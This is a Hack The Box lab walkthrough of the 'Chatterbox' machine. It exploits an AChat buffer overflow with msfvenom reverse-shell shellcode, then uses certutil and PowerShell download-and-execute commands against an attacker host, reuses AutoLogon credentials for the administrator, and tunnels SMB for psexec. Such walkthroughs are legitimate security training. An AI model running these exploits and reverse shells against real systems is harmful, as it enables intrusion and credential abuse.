Chatterbox
Contents
Port scan
u505@naos:~/HTB/Machines/Chatterbox$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.74
Starting masscan 1.0.5 at 2021-01-14 17:03:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 9255/tcp on 10.10.10.74 Discovered open port 9256/tcp on 10.10.10.74
u505@naos:~/HTB/Machines/Chatterbox$ nmap -sC -sV chatterbox Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -sC -sV chatterbox Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST Nmap scan report for chatterbox (10.10.10.74) Host is up. All 1000 scanned ports on chatterbox (10.10.10.74) are filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 201.74 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -p 9255,9256 -sC -sV chatterbox Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:07 EST Nmap scan report for chatterbox (10.10.10.74) Host is up (0.043s latency).
PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
Achat buffer overflow
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit achat
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (M | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Sc | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit -m 36025
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/36025
Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Chatterbox/36025.py
Installing and running Achat v0.150 beta7 in a Windows 10 box, shows ports TCP 9255 9256 and UDP 9256
Test PoC in Windows 10 box
C:\Users\u505>tasklist /v | findStr AChat chrome.exe 2916 RDP-Tcp#1 3 141,960 K Running WINDOWS10\u505 0:00:14 AChat download | SourceForge.net - Google Chrome AChat.exe 2784 RDP-Tcp#1 3 23,496 K Running WINDOWS10\u505 0:00:01 AChat v0.150 beta7
C:\Users\u505>netstat -ano | findStr 2784 TCP 192.168.76.21:9255 0.0.0.0:0 LISTENING 2784 TCP 192.168.76.21:9256 0.0.0.0:0 LISTENING 2784 UDP 192.168.76.21:9256 *:* 2784
Try of the buffer overflow.
u505@naos:~/HTB/Machines/Chatterbox$ cp 36025.py testw10_calc.py
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_calc.py 36025.py
57c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
78c78
< sock.close()
---
> sock.close()
\ No newline at end of file
Run the PoC, only updating the target IP
u505@naos:~/HTB/Machines/Chatterbox$ python testw10_calc.py
---->{P00F}!
Once the payload sent, the chat window showed a lot of Z, crashed and opened a calculator.
Test reverse shell on Windows 10
Modification of the msfvenom payload to create a reverse shell instead of a calc.exe
u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/unicode_mixed x86/unicode_mixed succeeded with size 774 (iteration=0) x86/unicode_mixed chosen with final size 774 Payload size: 774 bytes Final size of python file: 3767 bytes buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" ...
Modification python
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_rev.py 36025.py
54,122d53
< #u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
< #Found 1 compatible encoders
< #Attempting to encode payload with 1 iterations of x86/unicode_mixed
< #x86/unicode_mixed succeeded with size 774 (iteration=0)
< #x86/unicode_mixed chosen with final size 774
< #Payload size: 774 bytes
< #Final size of python file: 3767 bytes
< buf = b""
< buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...
< buf += b"\x53\x69\x6f\x39\x45\x41\x41"
<
126c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
147c78
< sock.close()
---
> sock.close()
\ No newline at end of file
The payload size is 774 bytes, that is less than maximum size (1152 bytes) of the exploit.
u505@naos:~/HTB/Machines/Chatterbox$ tail -n 25 testw10_rev.py
# Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('192.168.1.21', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) p += "\x62" + "A"*45 p += "\x61\x40" p += "\x2A\x46" p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" p += "\x61\x43" + "\x2A\x46" p += "\x2A" + fs + "C" * (157-len(fs)- 31-3) p += buf + "A" * (1152 - len(buf)) p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!" i=0 while i<len(p): if i > 172000: time.sleep(1.0) sent = sock.sendto(p[i:(i+8192)], server_address) i += sent sock.close()
Start listener.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Run the exploit.
u505@naos:~/HTB/Machines/Chatterbox$ python testw10_rev.py
---->{P00F}!
The reverse shell is opened.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.1.21. Ncat: Connection from 192.168.1.21:58472. Microsoft Windows [Version 10.0.19042.685] (c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami whoami windows10\u505
Again, the exploit crashes the chat program. That seems logical, but it needs to be taken under consideration.
Exploit the target
I modified the exploit with the target address and the msfvenom payload with the correct values.
u505@naos:~/HTB/Machines/Chatterbox$ grep 10.10 buf_achat.py #u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python server_address = ('10.10.10.74', 9256)
Raised a listener.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And run the exploit.
u505@naos:~/HTB/Machines/Chatterbox$ python buf_achat.py
---->{P00F}!
And the reverse shell opens.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.74. Ncat: Connection from 10.10.10.74:49191. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami chatterbox\alfred
User flag
C:\Windows\system32>cd c:\Users\alfred\desktop cd c:\Users\alfred\desktop
c:\Users\Alfred\Desktop>type user.txt type user.txt <USER_FLAG>
Privileges escalation
It is a Windows 7 with all hotfixes installed.
c:\Users\Alfred\Desktop>systeminfo systeminfo
Host Name: CHATTERBOX OS Name: Microsoft Windows 7 Professional OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00371-222-9819843-86663 Original Install Date: 12/10/2017, 9:18:19 AM System Boot Time: 1/14/2021, 12:00:46 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 2 Processor(s) Installed. [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,541 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,436 MB Virtual Memory: In Use: 659 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \\CHATTERBOX Hotfix(s): 183 Hotfix(s) Installed. [01]: KB2849697 [02]: KB2849696 ... [183]: KB4054518 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.74
winPEAS
Create the web server with the winPEAS executable.
u505@naos:~/HTB/Machines/Chatterbox$ mkdir web u505@naos:~/HTB/Machines/Chatterbox$ cd web u505@naos:~/HTB/Machines/Chatterbox/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/./winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe ./ u505@naos:~/HTB/Machines/Chatterbox/web$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Upload winPEAS to the target.
c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe **** Online **** 000000 ... 073400 CertUtil: -URLCache command completed successfully.
Run the enumeration.
c:\Users\Alfred\Desktop>winPEAS.exe
winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
...
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found!!
DefaultUserName : Alfred
DefaultPassword : Welcome1!
...
winPEAS found Alfred credentials. I confirm it querying winlogon keys in the registry.
c:\Users\Alfred\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 ShutdownWithoutLogon REG_SZ 0 WinStationsDisabled REG_SZ 0 DisableCAD REG_DWORD 0x1 scremoveoption REG_SZ 0 ShutdownFlags REG_DWORD 0x80000033 DefaultDomainName REG_SZ DefaultUserName REG_SZ Alfred AutoAdminLogon REG_SZ 1 DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
Shell as administrator
We need to access the port 445 to perform a psexec. We need to create a tunnel from our box to the target.
First step Download chisel.
u505@naos:~/HTB/Machines/Chatterbox/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_386.gz u505@naos:~/HTB/Machines/Chatterbox/web$ gunzip chisel_1.7.4_windows_386.gz
Upload chisel to the target.
c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe **** Online **** 000000 ... 724e00 CertUtil: -URLCache command completed successfully.
Run chisel server on our box. Because the port 445 is less than 1024, we need to run it as root.
u505@naos:~/HTB/Machines/Chatterbox$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz u505@naos:~/HTB/Machines/Chatterbox$ gunzip chisel_1.7.4_linux_amd64.gz u505@naos:~/HTB/Machines/Chatterbox$ chmod +x chisel_1.7.4_linux_amd64 u505@naos:~/HTB/Machines/Chatterbox$ sudo ./chisel_1.7.4_linux_amd64 server --reverse --port 4445 [sudo] password for u505: 2021/01/14 14:33:55 server: Reverse tunnelling enabled 2021/01/14 14:33:55 server: Fingerprint KtsgB5aG+gCbCLsd2GVsizSCQg4gNCYDT0mfdac7R74= 2021/01/14 14:33:55 server: Listening on http://0.0.0.0:4445
Run chisel client from the target. We use start /b to run in background and avoid loosing access to the console.
c:\Users\Alfred\Desktop>start /b chisel.exe client 10.10.14.7:4445 R:445:127.0.0.1:445 2021/01/15 01:38:05 client: Connecting to ws://10.10.14.7:4445 2021/01/15 01:38:15 client: Connected (Latency 40.0023ms)
We confirm that user alfred is owned.
u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u alfred -p 'Welcome1!'
SMB 127.0.0.1 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 127.0.0.1 445 CHATTERBOX [+] Chatterbox\alfred:Welcome1!
And the password of the user administrator is the same.
u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u administrator -p 'Welcome1!'
SMB 127.0.0.1 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 127.0.0.1 445 CHATTERBOX [+] Chatterbox\administrator:Welcome1! (Pwn3d!)
A psexec to access the machine.
u505@naos:~/HTB/Machines/Chatterbox$ python3 /opt/utils/impacket/examples/psexec.py administrator@127.0.0.1 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password: [*] Requesting shares on 127.0.0.1..... [*] Found writable share ADMIN$ [*] Uploading file DCTXVrZo.exe [*] Opening SVCManager on 127.0.0.1..... [*] Creating service CMKA on 127.0.0.1..... [*] Starting service CMKA..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system C:\Windows\system32>type c:\users\administrator\desktop\root.txt b'Access is denied.\r\n' C:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 5 [*] Opening SVCManager on 127.0.0.1..... [*] Stopping service rbpD..... [*] Removing service rbpD..... [*] Removing file tDvADwgE.exe.....
This was unexpected. The user system doesn't have rights over the file. We need to log as administrator directly. We copy nishang reverse powershell.
u505@naos:~/HTB/Machines/Chatterbox/web$ cp /usr/share/windows-resources/nishang/Shells/Invoke-PowerShellTcp.ps1 ./ u505@naos:~/HTB/Machines/Chatterbox/web$ mv Invoke-PowerShellTcp.ps1 RevAdmin4446.ps1
At the end of the script we add the reverse shell.
u505@naos:~/HTB/Machines/Chatterbox/web$ vi RevAdmin4446.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ tail -n 5 RevAdmin4446.ps1
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4446
We create a second script to call our previous script (RevAdmin4446.ps1) but with the administrator credentials.
u505@naos:~/HTB/Machines/Chatterbox/web$ vi cred.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ cat cred.ps1
$pass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$pass)
start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/RevAdmin4446.ps1')" -Credential $cred
Raise a listener on port 4446.
u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
Call the cred.ps1 script from our user Alfred.
c:\Users\Alfred\Desktop>start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
The reverse shell is opened as administrator.
u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.74. Ncat: Connection from 10.10.10.74:49169. Windows PowerShell running as user Administrator on CHATTERBOX Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\Alfred\Desktop> whoami whoami chatterbox\administrator PS C:\Users\Alfred\Desktop>type c:\users\administrator\desktop\root.txt <ROOT_FLAG>
Alternative change root.txt rights
I noticed while trying to change the rights of the file root.txt with the user System, that user Alfred had rights on the Adminstrator's Desktop folder. This method allows us to read the file root.txt, but the box is not owned.
c:\Users\Alfred\Desktop>cd c:\Users\Administrator\Desktop cd c:\Users\Administrator\Desktop
Alfred has access to the folder Desktop.
c:\Users\Administrator\Desktop>type root.txt type root.txt Access is denied.
But not on the file root.txt
c:\Users\Administrator\Desktop>icacls root.txt icacls root.txt root.txt CHATTERBOX\Administrator:(F)
Alfred can also list the rghts of the file root.txt
Successfully processed 1 files; Failed processing 0 files
Alfred appears to have full control of the folder, and inherited objects (but system had too, and it failed).
c:\Users\Administrator\Desktop>icacls c:\Users\Administrator\Desktop
icacls c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
Provide full access to the file to alfred.
c:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F icacls root.txt /grant alfred:F processed file: root.txt Successfully processed 1 files; Failed processing 0 files
Alfred has now full access.
c:\Users\Administrator\Desktop>icacls root.txt icacls root.txt root.txt CHATTERBOX\Alfred:(F) CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 files
The flag is readable.
c:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT_FLAG>
Alfred is the owner of the file.
c:\Users\Administrator\Desktop>dir /q root.txt dir /q root.txt Volume in drive C has no label. Volume Serial Number is 9034-6528
Directory of c:\Users\Administrator\Desktop
01/15/2021 02:03 AM 34 CHATTERBOX\Alfred root.txt 1 File(s) 34 bytes 0 Dir(s) 19,466,502,144 bytes free
References
- How do I change automatic logon via Script or Command Line?
- PowerShell says “execution of scripts is disabled on this system.”
- Run ScriptBlock with different credentials
Daniel Simao 23:35, 14 January 2021 (EST)
